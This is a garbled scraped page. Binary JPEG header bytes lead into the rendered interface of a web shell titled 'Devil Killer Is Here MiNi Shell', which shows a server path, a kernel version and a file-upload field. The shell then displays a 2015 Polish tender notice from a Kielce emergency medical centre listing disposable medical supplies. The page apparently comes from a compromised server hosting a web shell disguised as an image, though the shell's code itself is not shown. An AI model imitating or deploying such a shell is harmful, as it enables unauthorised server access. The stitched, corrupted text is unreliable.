JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151117/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151117/309388-N-2015.html

<p class="kh_header"><b>Kielce: Dostawy sprzętu jednorazowego użytku</b><br>
<b>Numer ogłoszenia: 309388 - 2015; data zamieszczenia: 17.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Świętokrzyskie Centrum Ratownictwa Medycznego i Transportu Sanitarnego , ul. Św. Leonarda 10, 25-311 Kielce, woj. świętokrzyskie, tel. 041 3612344 w. 29.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.scrmits.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy sprzętu jednorazowego użytku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> L.p.	Asortyment	J.m	Ilość sztuk opakowań rolek
1	Cewnik Foley CH16-30, obustronnie pokryty elastomerem silikonowym z plastikową zastawką o pojemności balonu (30-45ml), jałowy. Na opakowaniu pojedynczym oraz zbiorczym nadrukowana fabrycznie informacja o max czasie przebywania cewnika w cewce moczowej pacjenta, sterylizowane radiacyjnie.
Op. a 10 sztuk.	1 op.	120
2	Cewnik do odsysania górnych dróg oddechowych nr 6-10, długość 40 cm , sterylny, z dwoma otworami bocznymi i jednym centralnym, pakowany jednostkowo, datą ważności i produkcji	1 szt.	130
3	Cewnik do odsysania górnych dróg oddechowych nr 12-20, długość 60 cm	1 szt.	1 000
4	Cewnik do podawania tlenu przez nos z drenem długości 180 do 210 cm, sterylny.	1 szt.	7 000
5	Czyściwo celulozowe szerokości 26,5 cm x 141 m, gramatura 65gr/m2, z perforacją co 38 cm	1 rolka	40
6	Elektrody piankowe z formułą hydrożelu płynnego, owalne o wymiarach 57x34mm	1 szt.	160 500
7	Elektrody piankowe pediatryczne, piankowe z formułą hydrożelu płynnego o wymiarach 57x34mm	1 szt.	1 000
8	Filtr oddechowy pediatryczny, elektrostatyczny, wirusowo-bakteriobójczy, sterylny z portem do  kapnografii zamykanym zatyczką, waga 9 g, przestrzeń martwa 10 ml	1 szt.	70
9	Filtr oddechowy elektrostatyczny, wirusowo-bakteriobójczy, sterylny z portem do kapnografii zamykanym zatyczką, waga 28,5g, przestrzeń martwa 45ml	1 szt	950
10	Folia izotermiczna (koc ratunkowy) o rozmiarze 1,6x2,4 m	1 szt.	600
11	Igła do injekcji jednorazowego użytku rozm. 5x25; sterylne op=100 szt	1 op.	35
12	Igła do injekcji jednorazowego użytku rozm. 0,6x30; sterylne op=100 szt	1 op.	140
13	Igła do injekcji jednorazowego użytku rozm. 0,7x40; sterylne op=100 szt	1 op.	450
14	Igła do injekcji jednorazowego użytku rozm. 0,8x40; sterylne op=100 szt	1 op.	750
15	Igła do injekcji jednorazowego użytku rozm. 0,9x40; sterylne op=100 szt	1 op.	280
16	Igła do pobierania leków z fiolek z gumowym korkiem z zakończeniem typu Pencil Point, zapobiegającym fragmentacji korka - rozm. 1.2 dł. 30mm - op. a 100 szt.	1 op.	200
17	Jednorazowe końcówki ochronne do termometru Braun a 20 szt.	1 op.	450
18	Kaczka jednorazowego użytku	1 szt.	30
19	Kaniula do długotrwałych wlewów dożylnych wykonana z PTFE, wolna od lateksu i PCV, z zaworem iniekcyjnym, z korkiem samodomykającym, z filtrem hydrofobowym, widoczna w promieniach RTG, korek luer - lock z trzpieniem poniżej jego krawędzi, ze skrzydełkami, rozmiar: 18G 1,2x32mm, przepływ 80ml/min.	1 szt.	15 000
20	Kaniula do długotrwałych wlewów dożylnych wykonana z PTFE, wolna od lateksu i PCV, z zaworem iniekcyjnym, z korkiem samodomykającym, z filtrem hydrofobowym, widoczna w promieniach RTG, korek luer - lock z trzpieniem poniżej jego krawędzi, ze skrzydełkami, rozmiar: 20G 1,0x32 mm, przepływ 54ml/min.	1 szt.	25 000
21	Kaniula do długotrwałych wlewów dożylnych wykonana z PTFE, wolna od lateksu i PCV, z zaworem iniekcyjnym, z korkiem samodomykającym, z filtrem hydrofobowym, widoczna w promieniach RTG, korek luer - lock z trzpieniem poniżej jego krawędzi, ze skrzydełkami, rozmiar 22G 0,8x25mm, przepływ 31ml/min.	1 szt.	10 000
22	Kaniula do długotrwałych wlewów dożylnych wykonana z PTFE, wolna od lateksu i PCV, z zaworem iniekcyjnym, z korkiem samodomykającym, z filtrem hydrofobowym, widoczna w promieniach RTG, korek luer - lock z trzpieniem poniżej jego krawędzi, ze skrzydełkami, rozmiar: 16G 1,7x45 mm, przepływ 180ml/min.	1 szt.	1 000
23	Kaniula do długotrwałych wlewów dożylnych wykonana z PTFE, wolna od lateksu i PCV, z zaworem iniekcyjnym, z korkiem samodomykającym, z filtrem hydrofobowym, widoczna w promieniach RTG, korek luer - lock z trzpieniem poniżej jego krawędzi, ze skrzydełkami, rozmiar: 24G 0,7x1,9 mm, przepływ 18ml/min.	1 szt.	450
24	Kaniula bezpieczna do długotrwałych wlewów dożylnych wyposażona w automatyczny, plastikowy zatrzask z obudową wykonaną z tworzywa sztucznego chroniący przed zakłuciem oraz zachlapaniem krwią, aktywowany w momencie usunięcia igły z mandrynu, posiadająca filtr hydrofobowy, standardowy zawór portu bocznego, 3 paski kontrastujące w RTG, wykonana z poliuretanu. Opakowanie typu folia - papier, rozmiar: 18G 1,3x32 mm, przepływ 103 ml/min.	1 szt.	100
25	Kaniula bezpieczna do długotrwałych wlewów dożylnych wyposażona w automatyczny, plastikowy zatrzask z obudową wykonaną z tworzywa sztucznego chroniący przed zakłuciem oraz zachlapaniem krwią, aktywowany w momencie usunięcia igły z mandrynu, posiadająca filtr hydrofobowy, standardowy zawór portu bocznego, 3 paski kontrastujące w RTG, wykonana z poliuretanu. Opakowanie typu folia - papier, rozmiar: 20 G 1,0x32 mm, przepływ 59ml/min.	1 szt.	100
26	Kieliszki jednorazowego użytku 75 szt. w jednym opakowaniu	1 op.	16
27	Korek do kaniul z trzpieniem poniżej jego krawędzi	1 szt.	100
28	Maska chirurgiczna na gumkach	1 szt.	800
29	Maska tlenowa z drenem dla dorosłych,	1 szt.	2 000
30	Maska tlenowa z drenem dla dzieci,	1 szt.	700
31	Maska tlenowa z drenem dla dzieci nebulizatorem	1 szt.	300
32	Maska tlenowa z drenem dla dorosłych nebulizatorem	1 szt,	500
33	Nakłuwacz 1,8 mm posiadający barwny  kod głębokości wkłucia a 200 szt.	1 szt.	130
34	Nerka jednorazowego użytku	1 szt.	250
35	Opaski uciskowe (stazy) bezlateksowe, jednorazowego użytku do pobierania krwi w kolorze niebieskim, wykonane z szerokiego rozciągliwego paska gumy syntetycznej, perforowane, płaskie. Na pojedynczym opakowaniu napisy w języku polskim oraz graficzna instrukcja obsługi. Rolka 25 szt.	1 op.	150
36	Plaster do mocowania kaniul 6 x 8 jałowy transparentny	1 szt.	60 000
37	Papier termoczuły do ekg Zoll 90x90x200,  	1 szt.	1 850
38	Papier do EKG Ascard 112mm x 25m	1 szt.	65
39	Papier do EKG Ascard 58mm x 25m	1 szt.	10
40	Przyrząd do przetaczania płynów infuzyjnych jałowy, w skład aparatu wchodzi: osłonka igły biorczej, igła biorcza dwukanałowa, hydrofobowy filtr powietrza z zatyczką w kolorze niebieskim, komora kroplowa 20 kropli = 1ml+/-0,1ml wolna od PCV, filtr płynu o wielkości oczek 15 um, zaciskacz rolkowy, dren medyczny dł. 150 cm, łącznik stożkowy luer - lock, osłonka łącznika luer - lock, sterylizowane EO opakowanie przyrządu blister-pack (folia-papier). Przyrząd w calości wolny od ftalanów (DEHP) informacja na opakowaniu jednostkowym).	1 szt.	2 000
41	Pęseta jednorazowego użytku mikrobiologicznie czysta	1 szt.	480
42	Rurka ustno - gardłowa Nr 0, sterylna , pakowana jednostkowo, z wyraźną datą produkcji i ważności, oznaczone kolorami	1 szt.	60
43	Rurka ustno - gardłowa Nr 5 sterylna , pakowana jednostkowo, z wyraźną datą produkcji i ważności, oznaczone kolorami	1 szt.	45
44	Rurka ustno - gardłowa Nr 1 sterylna , pakowana jednostkowo, z wyraźną datą produkcji i ważności, oznaczone kolorami	1 szt.	45
45	Rurka ustno - gardłowa Nr 2 sterylna , pakowana jednostkowo, z wyraźną datą produkcji i ważności, oznaczone kolorami	1 szt.	130
46	Rurka ustno - gardłowa Nr 3 sterylna, pakowana jednostkowo, z wyraźną datą produkcji i ważności, oznaczone kolorami	1 szt.	200
47	Rurka ustno - gardłowa Nr 4 sterylna, pakowana jednostkowo, z wyraźną datą produkcji i ważności, oznaczone kolorami	1 szt.	250
48	Rurka intubacyjna bez mankietu( dziecięca) Nr 2; 2,5; 3; 3,5; 4; 4,5;5;5,5;6	1 szt.	160
49	Rurka intubacyjna z mankietem niskociśnieniowym, z podwójnym znacznikiem głębokości  Nr 5 - 9,5	1 szt.	950
50	Szpatułka drewniana sterylna x 100 szt., pakowana jednostkowo, z datą ważności i produkcji	1 op.	400
51	Strzykawka trzyczęściowa 2ml Luer, położenie końcówki centralne, cylinder o wysokim stopniu przejrzystości, z czytelną i nieścieralną, rozszerzoną skalą co 0,1ml do 2,5ml, kontrastujący tłok, gumowa część tłoka z podwójnym uszczelnieniem wyraźna kryza zabezpieczająca przed wysunięciem tłoka, tłok w kolorze zielonym z czterema nacięciami ułatwiającymi jego załamanie po wykonanej procedurze, opakowanie typu blister-pack z polskimi opisami oraz datą produkcji i ważności; pakowane w kartonowe opakowania, op. 100 szt. Rozmiar kodowany kolorystycznie na opakowaniu.	1 op.	650
52	Strzykawka trzyczęściowa 5ml Luer, położenie końcówki centralne, cylinder o wysokim stopniu przejrzystości, z czytelną i nieścieralną, rozszerzoną skalą co 0,2ml do 5ml i co 0,25ml do 5,5ml, kontrastujący tłok, gumowa część tłoka z podwójnym uszczelnieniem wyraźna kryza zabezpieczająca przed wysunięciem tłoka, tłok w kolorze zielonym z czterema nacięciami ułatwiającymi jego załamanie po wykonanej procedurze, opakowanie typu blister-pack z polskimi opisami i datą produkcji i ważności; pakowane w kartonowe opakowania, op. 100 szt. Rozmiar kodowany kolorystycznie na opakowaniu.	1 op.	600
53	Strzykawka trzyczęściowa 10ml Luer, położenie końcówki centralne, cylinder o wysokim stopniu przejrzystości, z czytelną i nieścieralną, rozszerzoną skalą co 0,2ml do 11ml,  kontrastujący tłok, gumowa część tłoka z podwójnym uszczelnieniem, wyraźna kryza zabezpieczająca przed wysunięciem, tłok w kolorze zielonym z czterema nacięciami ułatwiającymi jego załamanie po wykonanej procedurze, opakowanie typu blister-pack z polskimi opisami oraz data produkcji ważności; pakowane w kartonowe opakowania op. 100 szt. Rozmiar kodowany kolorystycznie na opakowaniu.	1 op.	95
54	Strzykawka trzyczęściowa 20ml Luer, położenie końcówki boczne, cylinder o wysokim stopniu przejrzystości, z czytelną i nieścieralną, rozszerzoną skalą co 0,5ml do 22ml, kontrastujący tłok, gumowa część tłoka z podwójnym uszczelnieniem, wyraźna kryza zabezpieczająca przed wysunięciem tłoka, tłok w kolorze zielonym z czterema nacięciami ułatwiającymi jego załamanie po wykonanej procedurze, opakowanie typu blister-pack z polskimi opisami oraz datą produkcji ważności; pakowane w kartonowe opakowania op. 50 szt. Rozmiar kodowany kolorystycznie na opakowaniu.	1 op.	200
55	Podład celulozowy dwuwarstwowy 50 cm x 50 cm z perforacją co 37 cm, nasączony środkiem bakteriobójczym, co ma być potwierdzone deklaracją producenta	1 rolka	63
56	Podład celulozowy dwuwarstwowy 59 cm x 80 cm z perforacją co 37 cm, nasączony środkiem bakteriobójczym, co ma być potwierdzone deklaracją producenta	1 rolka	15
57	Pojemniki na odpady medyczne 0,7 l o owalnej podstawie, wykonane z PP, z otworem o średnicy max. 40 mm ( po usunięciu zabezpieczeń otworu wrzutowego), kolor  czerwony	1 szt.	4 550
58	Pojemniki na odpady medyczne 5 l wykonane z PP, z pokrywą i otworem o średnicy minimum 90 mm kolor  czerwony	1 szt.	4 500
59	Pojemnik na odpady medyczne 10l wykonany z PP,z pokrywą i otworem o średnicy minimum 90mmm, kolor  czerwony	1 szt.	1 500
60	Przedłużacz tlenowy sterylny długości min. 2,0 m	1 szt.	95
61	Prowadnica do rurek intubacyjnych- rozmiary 6Fr,10Fr,14Fr, sterylne	1 szt.	25
62	Rękawice diagnostyczne, lateksowe, bezpudrowe z wewnętrzną warstwą polimerową, z rolowanym mankietem, teksturowane jednorodnie na całej powierzchni dłoni i palców. Grubość pojedynczej ścianki na palcu 0,12mm, dłoni 0,11mm, mankiecie 0,08mm, długość 240mm.Odporne na przenikanie wirusów zgodnie z normą z ASTM F 1671 oraz substancji chemicznych zgodnie  z EN 374-3 potwierdzone badaniami z jednostki niezależnej. Kolor naturalnego lateksu. Opakowanie po100 sztuk. Rozmiar M.	1 op.	150
63	Rękawice diagnostyczne, lateksowe, bezpudrowe z wewnętrzną warstwą polimerową, z rolowanym mankietem, teksturowane jednorodnie na całej powierzchni dłoni i palców. Grubość pojedynczej ścianki na palcu 0,12mm, dłoni 0,11mm, mankiecie 0,08mm, długość 240mm. Odporne na przenikanie wirusów zgodnie z normą z ASTM F 1671 oraz substancji chemicznych zgodnie  z EN 374-3 potwierdzone badaniami z jednostki niezależnej. Kolor naturalnego lateksu. Opakowanie po 100 sztuk. Rozmiar L. 	1 op.	230
64	Rękawice diagnostyczne winylowe, bezpudrowe z wewnętrzną warstwą poliuretanową, gładkie, rolowany mankiet, grubość pojedynczej ścianki na palcu oraz dłoni 0,08mm(+/- 0,02mm), mankiecie 0,05mm(+/- 0,02mm), posiadające badania z jednostek niezależnych od producenta potwierdzające brak zawartości DEHP oraz potwierdzające zgodność z normą EN 374 (wodorotlenek sodu 40% - klasa 6), ASTM F 1671. Rękawice dopuszczone do pracy w labolatorium poprzez świadectwo PZH. kolor biały (półprzeźroczysty). opakowanie po 100 sztuk, rozmiary S, M, L.	1 op.	280
65	Rękawice diagnostyczne do procedur o podwyższonym ryzyku, lateksowe, bezpudrowe, chlorowane.Grubość pojedynczej ścianki na palcu 0,40mm, dłoni 0,30mm, mankiecie 0,20mm, długość 295-300mm, rozciągliwość przed starzeniem 900%,siła zrywająca przed starzeniem 900%, siła zrywająca przed starzeniem 33N. Zarejestrowane jako wyrób medyczny oraz środek ochrony osobistej kategorii III. Opakowanie po 25 par, rozmiary S, M, L, XL.	1 op.	130
66	Rękawice diagnostyczne nitrylowe o obniżonej grubości. Grubość na palcu 0,08mm, dłoni 0,07mm, mankiecie 0,06mm. Rolowany mankiet, teksturowane tylko na palcach, kolor niebieski, polimerowane od strony roboczej, chlorowane od wewnątrz, długość min. 240mm. Zarejestrowane jako wyrób medyczny oraz środek ochrony osobistej kategorii III. Przebadane na przenikalność min. 10 substancji chemicznych na conajmniej 2 poziomie ochrony  potwierdzone badaniami z jednostki niezależnej od producenta. Informacja o substancjach oraz poziomie ochrony nadrukowana na opakowaniu. Dopuszczone do kontaktu z żywnością potwierdzone piktogramami na opakowaniu. Zgodnie z normą ASTM F1671 potwierdzone badaniami z jednostki niezależnej. Pozbawione tiuramów oraz MBT potwierdzone badaniami HPLC z jednostki niezależnej. Rozmiar kodowany kolorystycznie na opakowaniu. Opakowanie po 200 szt. (XS-L) oraz 180 sztuk (XL)	1 op.	6 000
67	Rękawice chirurgiczne lateksowe sterylne z dodatkiem żelu aloesowego, bezpudrowe, z rolowanym mankietem, z wewnętrzną i zewnętrzną warstwą polimerową, kolor zielony. Grubość pojedynczej ścianki na palcu 0,17mm, dłoni 0,16mm, mankiecie 0,15mm, długość 275-300 mm, rozciągliwość przed starzeniem min. 870%. Na każdej rękawicy nadruk rozmiaru. Opakowanie wew. papierowe, zew. folia (nie składane na pół). Rozmiary 5,5-9,0.	1 para	950
68	Staza gumowa, lateksowa	1 szt.	90
69	Szyna Kramera długość 150 x 10 cm	1 szt.	40
70	Szyna Kramera długość 100x 10cm	1 szt.	75
71	Szyna Kramera długość 80 x 12 cm	1 szt.	50
72	Szyna Kramera  długość 50 x 8 cm	1 szt.	15
73	Układ noworodkowy, 2 rury o długości 1,2 m, średnicy 10mm, końcówki 15 M od strony respiratora, od strony pacjenta złącze Y z portem 7,6 i końcówką 15F	1 szt.	30
74	Układ nnoworodkowy, 2 rury o długości 1,6 m, średnicy 10mm,końcówki 15 M od strony respiratora, od strony pacjenta złącze Y z portem 7,6 i końcówką 15F	1 szt.	80
75	Worek na mocz 2l z odpływem jałowy	1 szt.	1 000
76	Zgłębnik żołądkowy ch 12-24/1250mm	1 szt.	120
77	Żel do EKG 250 ml	1 szt.	50
78	Bezigłowy port dostępu żylnego z systemem podzielnej samouszczelniającej się niebieskiej membrany silikonowej, nie wystającej poza obręb portu, z czasem stosowania przez 7 dni lub do 140 aktywacji, pasujący do złączy luer i luer-lock, odporny na działanie lipidów, bez części metalowych, obudowa przeżroczysta z polikarbonu, objętość 0,09 ml. Przepływy:1 PSI:360ml/min; 3 PSI: 600ml/min; 5 PSI; 750 ml/min. Pozbawione lateksu, PCV i ftalanów. Pakowany pojedyńczo, sterylny. Opakowanie folia/papier.	1 szt.	50
79	Bezigłowy port iniekcyjny z przedłużaczem z czasem stosowania przez 7 dni lub do 140 aktywacji, przeźroczysta obudowa, niebieska silikonowa samouszcelniająca się membrana nie wystająca poza obręb portu, bez elementów metalowych, długość całkowita 14cm z przesuwnym zaciskiem na drenie. Dostępne w dwóch średnicach drenów: 1,2x2,5 mm (przepływ 76 ml/min.) i 3,0x 4,1 mm (przepływ 152 ml/min.). Pakowany pojedyńczo, sterylny. Opakowanie folia/papier.	1 szt.	40
80	Strzykawka do pomp infuzyjnych 50/60 ml trzyczęściowa, Luer-Lock,	1 szt.	100

    Zamawiający wymaga dostawy sprzętu jednorazowego użytku w jednostkach miary  
    takich jak w opisie przedmiotu zamówienia i formularzu cenowym..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Na potwierdzenie 
      spełniania warunku udziału w postępowaniu Wykonawca złoży podpisane  oświadczenie 
      o spełnianiu  warunków udziału w postępowaniu art.22 ust.1  pkt.1÷4, załącznik nr 2 do 
      SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Na potwierdzenie 
      spełniania warunku udziału w postępowaniu Wykonawca złoży podpisane  oświadczenie 
      o spełnianiu  warunków udziału w postępowaniu art.22 ust.1  pkt.1÷4, załącznik nr 2 do 
      SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Na potwierdzenie 
      spełniania warunku udziału w postępowaniu Wykonawca złoży podpisane  oświadczenie 
      o spełnianiu  warunków udziału w postępowaniu art.22 ust.1  pkt.1÷4, załącznik nr 2 do 
      SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Na potwierdzenie 
      spełniania warunku udziału w postępowaniu Wykonawca złoży podpisane  oświadczenie 
      o spełnianiu  warunków udziału w postępowaniu art.22 ust.1  pkt.1÷4, załącznik nr 2 do 
      SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Na potwierdzenie 
      spełniania warunku udziału w postępowaniu Wykonawca złoży podpisane  oświadczenie 
      o spełnianiu  warunków udziału w postępowaniu art.22 ust.1  pkt.1÷4, załącznik nr 2 do 
      SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
